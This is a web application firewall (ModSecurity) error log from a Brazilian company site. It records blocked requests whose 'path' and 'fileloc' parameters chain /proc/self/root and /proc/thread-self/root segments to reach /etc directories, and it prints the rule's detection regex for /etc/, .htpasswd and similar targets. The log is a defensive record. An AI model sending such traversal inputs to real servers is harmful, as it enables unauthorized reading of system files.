https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:07.306434 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.241.46:47870] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyY6TCbgAP5jq5TehH_gAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:09.675462 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:33384] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyZaTCbgAP5jq5TehIAAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:10.951233 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.241.46:33392] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyZkr9dMAiw-8KANNlWAAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:12.160220 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:33404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyaNSswJuvopo3lOh9IQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:13.332582 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:40864] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyaf9ocpUE4ed4uDwQRgAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:15.500271 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:33416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhya1ajLEzk2WiQ-10uvwAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:16.884080 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.241.46:33428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhybEr9dMAiw-8KANNlXQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:18.116467 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.241.46:46652] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhybqQpVkWug9HeOt9QPQAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:26.136709 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:46660] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhydtSswJuvopo3lOh9LgAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:14:26.775446 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:46664] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyso6lpbStxTqkSkuF3QAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:14:28.089696 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:39222] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhytLysWC90G-1nBrBhRgAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:14:30.407332 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:39226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyttSswJuvopo3lOh9WwAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:14:58.612293 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.243.203:51170] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy0s_BxrYCr4hPDw8HEAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:14:59.972342 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.244.31:57948] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhy07ysWC90G-1nBrBhSQAAAYg"]
[Mon Mar 16 18:15:06.839447 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:39242] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy2tSswJuvopo3lOh9jAAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:08.166597 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:56582] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy3I6lpbStxTqkSkuF4QAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:09.057035 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:49292] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy3dSswJuvopo3lOh9jwAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:13.719587 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:51900] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy4bysWC90G-1nBrBhUwAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:14.915977 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:56588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy4rysWC90G-1nBrBhVAAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:15:24.121135 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.241.46:56604] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy7I6lpbStxTqkSkuF6wAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:25.511546 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:37072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy7Ur9dMAiw-8KANNlfAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:26.703260 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:37082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy7v9ocpUE4ed4uDwQaAAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
